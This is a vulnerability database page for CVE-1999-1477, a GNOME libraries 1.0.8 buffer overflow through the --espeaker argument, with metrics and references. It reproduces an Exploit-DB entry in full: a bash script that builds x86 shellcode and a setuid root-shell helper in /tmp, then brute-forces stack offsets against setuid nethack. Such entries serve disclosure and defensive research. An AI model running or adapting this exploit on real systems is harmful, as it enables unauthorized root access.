CVE-1999-1477 : Detail

CVE-1999-1477

0.1%V4
Local
2001-09-12
02h00 +00:00
2024-08-01
17h18 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in GNOME libraries 1.0.8 allows local user to gain root access via a long --espeaker argument in programs such as nethack.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 19512

Publication date : 1999-09-25 22h00 +00:00
Author : Brock Tellier
EDB Verified : Yes

source: https://www.securityfocus.com/bid/663/info A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access. Calling a program linked against GNOME with the command like arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow. One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'. It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable. #!/bin/bash # Generic exploit for GNOME apps under Linux x86 # Our overflowed buffer is just 80 bytes so we'll have to get our settings # just so. Hence the shell script. # # This should work against any su/gid GNOME program. The only one that comes # with RH6.0 that is su/gid root is (the irony is killing me) nethack. # # Change the /usr/games/nethack statement in the while loop below to exploit # a different program. # # -Brock Tellier btellier@webley.com echo "Building /tmp/gnox.c..." cat > /tmp/gnox.c <<EOF /* * Generic GNOME overflow exploit for Linux x86, tested on RH6.0 * Will work against any program using the GNOME libraries in the form * Keep your BUFSIZ at 90 and only modify your offset * */ #include <stdlib.h> #include <stdio.h> char gnoshell[]= /* Generic Linux x86 shellcode modified to run our program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/gn"; #define LEN 120 #define BUFLEN 90 /* no need to change this */ #define NOP 0x90 #define DEFAULT_OFFSET 300 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset, i; int buflen = BUFLEN; long int addr; char buf[BUFLEN]; char gnobuf[LEN]; if(argc > 2) { fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else { offset=DEFAULT_OFFSET; } addr=get_sp(); fprintf(stderr, "Generic GNOME exploit for Linux x86\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n\n"); fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset, buflen, offset); memset(buf,NOP,buflen); memcpy(buf+35,gnoshell,strlen(gnoshell)); for(i=35+strlen(gnoshell);i<buflen-4;i+=4) *(int *)&buf[i]=addr-offset; sprintf(gnobuf, "--enable-sound --espeaker=%s", buf); for(i=0;i<strlen(gnobuf);i++) putchar(gnobuf[i]); } EOF echo "...done!" echo "Building /tmp/gn.c..." cat > /tmp/gn.c <<EOF #include <unistd.h> void main() { printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); setreuid(geteuid(), geteuid()); setregid(getegid(), getegid()); printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); system("/bin/bash"); } EOF echo "...done!" echo "Compiling /tmp/gnox..." gcc -o /tmp/gnox /tmp/gnox.c echo "...done!" echo "Compiling /tmp/gn..." gcc -o /tmp/gn /tmp/gn.c echo "...done!" echo "Launching attack..." offset=0 while [ $offset -lt 10000 ]; do /usr/games/nethack `/tmp/gnox $offset` offset=`expr $offset + 4` done echo "...done!"

Products Mentioned

Configuraton 0

Gnome>>Gnome_libs >> Version 1.0.8

    Configuraton 0

    Mandrakesoft>>Mandrake_linux >> Version 6.0

    References

    http://www.securityfocus.com/bid/663
    Tags : vdb-entry, x_refsource_BID
    http://www.securityfocus.com/archive/1/28717
    Tags : mailing-list, x_refsource_BUGTRAQ
    The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.